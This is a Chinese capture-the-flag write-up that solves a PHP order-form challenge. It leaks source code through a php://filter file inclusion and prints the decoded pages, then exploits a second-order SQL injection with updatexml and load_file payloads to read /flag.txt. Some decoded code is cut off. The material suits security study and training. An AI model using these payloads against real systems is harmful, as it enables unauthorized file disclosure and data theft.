打开场景，查看源码，找到hint

所以考虑文件读漏洞
尝试?file=php://filter/convert.base64-encode/reosurce=index.php
成功回显

PD9waHAKCmluaV9zZXQoJ29wZW5fYmFzZWRpcicsICcvdmFyL3d3dy9odG1sLycpOwoKLy8gJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwokZmlsZSA9IChpc3NldCgkX0dFVFsnZmlsZSddKSA/ICRfR0VUWydmaWxlJ10gOiBudWxsKTsKaWYgKGlzc2V0KCRmaWxlKSl7CiAgICBpZiAocHJlZ19tYXRjaCgiL3BoYXJ8emlwfGJ6aXAyfHpsaWJ8ZGF0YXxpbnB1dHwlMDAvaSIsJGZpbGUpKSB7CiAgICAgICAgZWNobygnbm8gd2F5IScpOwogICAgICAgIGV4aXQ7CiAgICB9CiAgICBAaW5jbHVkZSgkZmlsZSk7Cn0KPz4KCjwhRE9DVFlQRSBodG1sPgo8aHRtbCBsYW5nPSJlbiI CjxoZWFkPgo8bWV0YSBjaGFyc2V0PSJ1dGYtOCI Cjx0aXRsZT5pbmRleDwvdGl0bGU CjxiYXNlIGhyZWY9Ii4vIj4KPG1ldGEgY2hhcnNldD0idXRmLTgiIC8 Cgo8bGluayBocmVmPSJhc3NldHMvY3NzL2Jvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI CjxsaW5rIGhyZWY9ImFzc2V0cy9jc3MvY3VzdG9tLWFuaW1hdGlvbnMuY3NzIiByZWw9InN0eWxlc2hlZXQiPgo8bGluayBocmVmPSJhc3NldHMvY3NzL3N0eWxlLmNzcyIgcmVsPSJzdHlsZXNoZWV0Ij4KCjwvaGVhZD4KPGJvZHk CjxkaXYgaWQ9ImgiPgoJPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICA8aDI MjA3N WPkeWUruS6hizkuI3mnaXku73lrp7kvZPlhbjol4/niYjlkJc/PC9oMj4KICAgICAgICA8aW1nIGNsYXNzPSJsb2dvIiBzcmM9Ii4vYXNzZXRzL2ltZy9sb2dvLWVuLnBuZyI PCEtLUxPR09MT0dPTE9HT0xPR08tLT4KICAgICAgICA8ZGl2IGNsYXNzPSJyb3ciPgoJCQk8ZGl2IGNsYXNzPSJjb2wtbWQtOCBjb2wtbWQtb2Zmc2V0LTIgY2VudGVyZWQiPgogICAgICAgICAgICAgICAgPGgzPuaPkOS6pOiuouWNlTwvaDM CiAgICAgICAgICAgICAgICA8Zm9ybSByb2xlPSJmb3JtIiBhY3Rpb249Ii4vY29uZmlybS5waHAiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0iYXBwbGljYXRpb24veC13d3ctdXJsZW5jb2RlZCI CiAgICAgICAgICAgICAgICAgICAgPHA CiAgICAgICAgICAgICAgICAgICAgPGgzPuWnk WQjTo8L2gzPgogICAgICAgICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBjbGFzcz0ic3Vic2NyaWJlLWlucHV0IiBuYW1lPSJ1c2VyX25hbWUiPgogICAgICAgICAgICAgICAgICAgIDxoMz7nlLXor506PC9oMz4KICAgICAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgY2xhc3M9InN1YnNjcmliZS1pbnB1dCIgbmFtZT0icGhvbmUiPgogICAgICAgICAgICAgICAgICAgIDxoMz7lnLDlnYA6PC9oMz4KICAgICAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgY2xhc3M9InN1YnNjcmliZS1pbnB1dCIgbmFtZT0iYWRkcmVzcyI CiAgICAgICAgICAgICAgICAgICAgPC9wPgogICAgICAgICAgICAgICAgICAgIDxidXR0b24gY2xhc3M9J2J0biBidG4tbGcgIGJ0bi1zdWIgYnRuLXdoaXRlJyB0eXBlPSJzdWJtaXQiPuaIkeato aYr mAgemSseS5i S6ujwvYnV0dG9uPgogICAgICAgICAgICAgICAgPC9mb3JtPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2Pgo8L2Rpdj4KCjxkaXYgaWQ9ImYiPgogICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KCQk8ZGl2IGNsYXNzPSJyb3ciPgogICAgICAgICAgICA8aDIgY2xhc3M9Im1iIj7orqLljZXnrqHnkIY8L2gyPgogICAgICAgICAgICA8YSBocmVmPSIuL3NlYXJjaC5waHAiPgogICAgICAgICAgICAgICAgPGJ1dHRvbiBjbGFzcz0iYnRuIGJ0bi1sZyBidG4tcmVnaXN0ZXIgYnRuLXdoaXRlIiA 5oiR6KaB5p l6K6i5Y2VPC9idXR0b24 CiAgICAgICAgICAgIDwvYT4KICAgICAgICAgICAgPGEgaHJlZj0iLi9jaGFuZ2UucGhwIj4KICAgICAgICAgICAgICAgIDxidXR0b24gY2xhc3M9ImJ0biBidG4tbGcgYnRuLXJlZ2lzdGVyIGJ0bi13aGl0ZSIgPuaIkeimgeS/ruaUueaUtui0p WcsOWdgDwvYnV0dG9uPgogICAgICAgICAgICA8L2E CiAgICAgICAgICAgIDxhIGhyZWY9Ii4vZGVsZXRlLnBocCI CiAgICAgICAgICAgICAgICA8YnV0dG9uIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1yZWdpc3RlciBidG4td2hpdGUiID7miJHkuI3mg7PopoHkuoY8L2J1dHRvbj4KICAgICAgICAgICAgPC9hPgoJCTwvZGl2PgoJPC9kaXY CjwvZGl2PgoKPHNjcmlwdCBzcmM9ImFzc2V0cy9qcy9qcXVlcnkubWluLmpzIj48L3NjcmlwdD4KPHNjcmlwdCBzcmM9ImFzc2V0cy9qcy9ib290c3RyYXAubWluLmpzIj48L3NjcmlwdD4KPHNjcmlwdCBzcmM9ImFzc2V0cy9qcy9yZXRpbmEtMS4xLjAuanMiPjwvc2NyaXB0Pgo8c2NyaXB0IHNyYz0iYXNzZXRzL2pzL2pxdWVyeS51bnZlaWxFZmZlY3RzLmpzIj48L3NjcmlwdD4KPC9ib2R5Pgo8L2h0bWw CjwhLS0/ZmlsZT0/LS0 Cg== 

base64解码

                
  
         
2077发售了,不来实体收藏版吗？
                  
    
                 
提交订单
                 
                     
                     
姓名:
                    
                    
电话:
                    
                    
地址:
                    
                    

                    我正是送钱之人
                
            
        
    



    

		

            
订单管理
            
                我要查订单
            
            
                我要修改收货地址
            
            
                我不想要了
            
		
	








 

注意到了ini_set(‘open_basedir’, ‘/var/www/html/’);也就是说这个页面不存在目录穿越，页面里在form表单里给了confirm.php，下载解码

query($sql);
    }

    if($fetch->num_rows>0) {
        $msg = $user_name."已提交订单";
    }else{
        $sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";
        $re = $db->prepare($sql);
        $re->bind_param("sss", $user_name, $address, $phone);
        $re = $re->execute();
        if(!$re) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单提交成功";
    }
} else {
    $msg = "信息不全";
}
?>
















	

        
        

            

                '.$msg.'';?>
                
                返回
                
            
        
    



    

		

            


            
订单管理
            
                我要查订单
            
            
                我要修改收货地址
            
            
                我不想要了
            
		
	

可以看到这个页面过滤的关键字包括select，update啥的，就知道往sql注入里想了，先简单看一下。给了config.php。继续下载解码

 "127.0.0.1",
    "username" => "root",
    "password" => "root",
    "dbname" =>"ctfusers"
);

$db = new mysqli($DATABASE['host'],$DATABASE['username'],$DATABASE['password'],$DATABASE['dbname']);
后面分析了confirm.php里面的insert发现用了预定义，并没有找到利用点，但是index.php里面还有其他页面，继续
change.php
query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>














	

		

			

                


                
修改收货地址
                

                    

                    
姓名:
                    
                    
电话:
                    
                    
地址:
                    
                    

                    

                    修改订单
                    
                
                '.$msg.'';?>
            
        
    



    

		

            


            
订单管理
            
                返回
            
            
                我要查订单
            
            
                我不想要了
            
		
	

在这里发现了问题

 $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];

新地址进行了单引号转义，但是old_address和user_id都是我们之前在insert阶段数据库存的，在insert阶段由于预定义的关系单引号之类的特殊字符会被转义
但是在存到数据库中时又会恢复到单引号的状态,而且address在confirm.php页面都没有进行关键词过滤
这样的话，就构成了二次注入
在原始页面地址页面注入payload:

1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#

1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),30,50)),0x7e),1)#

修改页面随便输，成功报错注入
读两次flag就好了
第一次读出来的:flag{3b97108b-7cd8-4ef6-aa38-b
第二次读出来的:b0c9fddd7376}
拼接：flag{3b97108b-7cd8-4ef6-aa38-b0c9fddd7376}
参考视频链接:https://www.bilibili.com/video/bv1o34y1b7SH